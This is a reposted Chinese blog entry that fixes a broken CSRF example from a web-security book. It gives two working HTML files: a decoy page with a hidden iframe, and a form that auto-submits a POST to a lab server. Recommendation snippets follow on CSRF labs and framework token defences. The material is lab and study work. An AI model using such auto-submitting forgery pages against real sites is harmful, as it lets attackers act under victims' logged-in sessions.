CSRF之POST

最新推荐文章于 2024-04-12 20:37:20 发布
最新推荐文章于 2024-04-12 20:37:20 发布
阅读量121 收藏
点赞数
文章标签: web安全 php
原文链接:http://www.cnblogs.com/debugzer0/p/5435662.html
版权

最近重温《白帽子讲web安全》一书,看到第4章CSRF的时候,发现有个错误的地方,第116页底部的代码中有个坑,那段代码是运行不了的。原因是在form表单中有个<input type=submit name="submit" value="submit">,因为name="submit"会和js代码中的f.submit()冲突,导致f.submit()的方法执行不了。

最后自己改了下代码做了下实验

fake.html

 1 <!DOCTYPE html>
 2 <html lang="en">
 3 <head>
 4     <meta charset="UTF-8">
 5     <title>CSRF 1</title>
 6 </head>
 7 <body>
 8     <div>
 9         hello
10     </div>
11     <iframe src="./csrf.html" frameborder="0" hidden="hidden"></iframe>    
12 </body>
13 </html>

CSRF.html

 1 <!DOCTYPE html>
 2 <html lang="en">
 3 <head>
 4     <meta charset="UTF-8">
 5     <title>CSRF</title>
 6 </head>
 7 <body>
 8     <form action="http://192.168.1.188/mycode/csrf.php" id="test" method="POST">
 9         <input type="text" name="user"><br>
10         <input type="text" name="pass">
11         
12     </form>
13 </body>
14 <script>
15     var f=document.getElementById("test");
16     f.getElementsByTagName("input")[0].value="user";
17     f.getElementsByTagName("input")[1].value="pass";
18     f.submit();
19 </script>
20 </html>

在firebug中查看网络数据包可以看到POST成功

 

转载于:https://www.cnblogs.com/debugzer0/p/5435662.html

weixin_34375054
关注
CSRF漏洞案例---POST
Ethan024的博客
03-20 1952
CSRF漏洞案例—POST型(本文仅供技术学习与分享) 实验环境: 皮卡丘靶场—CSRFCSRF(POST) 实验步骤: 在原始的个人资料上进行修改,将性别改成Female,地址改成Beijing,邮箱改为lucy@qq.com: 查看burpsuite,发现请求通过POST方式提交,参数是通过请求体传输,因此无法通过URL伪造参数; 如图在burpsuite生成PoC 将Beijing改为ShangHai,lucy@qq.com改为jack@qq.com。再点击右下角Test
pikachu-CSRF(跨站请求伪造)
a1245678899的博客
11-10 616
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。点击修改个人信息然后使用burpsuite抓包可以看到这个数据的传输过程是get型,数据包含在URL之中直接在URL之中构造包含自己信息的网址,伪造一下,诱导用户去点击。当链接被点击以后,可以看到信息已经被修改。
CSRF简单介绍及利用方法
weixin_33980459的博客
10-27 361
x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的。根据HTTP请求方式,CSRF利用方式可分为两种。   0x01 GET类型的CSRF 这种类型的CSRF一般是由于程序员安全意识不强造成的。GET类型的CSRF利用非常简单,只需要一个HTTP请求...
csrf(post)
weixin_50887021的博客
06-26 400
csrf实验准备实验环境实验步骤 实验准备 实验环境 卡利、xshell、火狐浏览器、burpsuite 实验步骤 1.实验所需脚本 111qqq.php <html> <head> <script> window.onload = function() { document.getElementById("postsubmit").click(); } </script> </head> <body> <form metho
csrf 的get和post方式的利用
mastergu2的博客
08-10 6954
CSRF的简单介绍 引用一下pikachu的官方描述: CSRF(跨站请求伪造)概述 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 这里列举一个场景解释一下,希望能够帮
CSRF
2302_80044238的博客
04-12 992
csrf中文名称是跨站请求伪造听起来好像和xss(跨站脚本攻击)差不多,但实际上差别很大 csrf是伪造成该网站的信任用户来进行非法访问 而xss是直接通过js代码进行非法输入来获取用户的具体信息比如:cookie。
启用CsrfPOST数据时出现的400错误
10-23
主要介绍了启用CsrfPOST数据时出现的400错误的相关资料,需要的朋友可以参考下
在django中使用post方法时,需要增加csrftoken的例子
09-17
在Django框架中,为了确保Web应用的安全性,防止CSRF(Cross-site request forgery)攻击,开发者需要在处理POST请求时添加一个名为`csrftoken`的令牌。CSRF攻击是一种恶意用户在用户浏览器中利用已登录用户的权限...
Django中ajax发送post请求 报403错误CSRF验证失败解决方案
12-31
今天学习Django框架,用ajax向后台发送post请求,直接报了403错误,说CSRF验证失败;先前用模板的话都是在里面加一个 {% csrf_token %} 就直接搞定了CSRF的问题了;很显然,用ajax发送post请求这样就白搭了; 文末...
vue-resource post数据时碰到Django csrf问题的解决
10-15
本知识点将详细介绍如何解决在使用vue-resource发起POST请求时遇到的Django CSRF验证问题。 ### Django CSRF保护机制 Django框架内置了CSRF保护机制,该机制可以有效防止跨站请求伪造攻击。在Django中,CSRF保护...
CSRF代码分析、漏洞讲解与post实战
永不垂头的博客
08-11 517
CSRF代码分析、漏洞讲解与post实战 一、csrf代码分析 index.php <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form action="" method="GET"> <p>name: <input type="text" name="name" /></
CSRFpost)漏洞复现
weixin_43696861的博客
05-25 1377
一、分析代码 发现验证refer,没有token验证,没有防止csrf的措施 二、构建一个错误信息脚本 csrf_poc.php 放入http://192.168.56.129/pikachu-master/vul/csrf 中 <html> <body> <form name="px" method="post" action="http://192.168.56.129/pikachu-master/vul/csrf/csrf.
Egg.js 使用POST方式提交表单时的 CSRF 安全验证问题
GentleSevenV的博客
11-25 592
Egg.js 在使用POST方式提交表单数据时会自动进行 CSRF 安全验证,invalid csrf token。
PiKachu之CSRF(跨站请求伪造)
angry_program的博客
02-19 1717
概述 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 这里...
egg.js 中接收post提交数据,以及csrf防范机制
DKcode
04-09 3861
一、在egg中获取post提交的数据,无需依赖其他第三方包 this.ctx.request.body //获取post数据,以对象的形式返回 二、egg中csrf防范机制 获取csrf,由egg随机生成的,每次访问都随机生成一个值 this.ctx.csrf 三、全局生成csrf 在每次渲染页面,都需要传递一个csrf显得比较麻烦时,我们可以通过middleware全局生成一个c...
(29.1)【CSRF详解】CSRF原理、利用过程、分类、举例、工具……
04-06 9869
一个细节都不不想放过
CSRF跨站请求伪造的GET情况和POST情况攻击和防御详解
Zeker62的博客
08-14 4569
CSRF 英文名:cross-site request forgery 叫做跨站请求伪造 CSRF不是很流行,但是具有很高的危险性,相比于XSS更加难以防范。 CSRF攻击效果:攻击者盗用身份,以被害者的姓名执行某些非法操作。比如使用账户发邮件、获取敏感信息,盗取银行账户。 CSRF攻击原理 当打开某个网站的时候,可以在网站上 进行一些操作,比如发邮件发消息 当结束会话的时候,这个网站可能会让你重新登录,或者提示身份过期,这是这个web在防范CSRF攻击的手段。 CSRF攻击是建立在会话之上的,比如.
Django中post请求csrf的处理
weixin_44632941的博客
02-19 882
在Django中,post请求在服务器端的视图处理中,如果没有csrf_token的内容,服务器端将会拒绝响应,解决办法有三种 1、在form表单中添加{ %csrf_token% }标签,数据可正常提交处理 2、将setting中的CsrfViewsMiddleware中间件删除 3、在处理视图函数前面加上装饰器@csrf_protect 其中后两种都会让网站失去csrf保护功能 ...
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
qq_53058639的博客
09-24 193
面试的时候的著名问题:“谈一谈你对 CSRF 与 SSRF 区别的看法”这个问题,如果我们用非常通俗的语言讲的话,CSRF 更像是钓鱼的举动,是用户攻击用户的;而对于 SSRF 来说,是由服务器发出请求,用户。
csrf ctf post
最新发布
05-08
CSRF(Cross-site request forgery)是一种网络安全攻击方式,攻击者通过构造特定的请求,诱导用户在已经登录的网站上执行某些操作,从而实现攻击目的。防范 CSRF 攻击的方法包括:使用 CSRF Token、检测 Referer 等。 CTF(Capture the Flag)是一种网络安全比赛,参赛者需要利用自己的技能在攻防场景中寻找漏洞并获取 flag。 POST 是 HTTP 协议中一种请求方法,用于向服务器提交数据。相比于 GET 请求,POST 请求可以传递更多的数据,但相应的安全风险也更高。在 CSRF 攻击中,攻击者通常会伪造 POST 请求来达到攻击目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值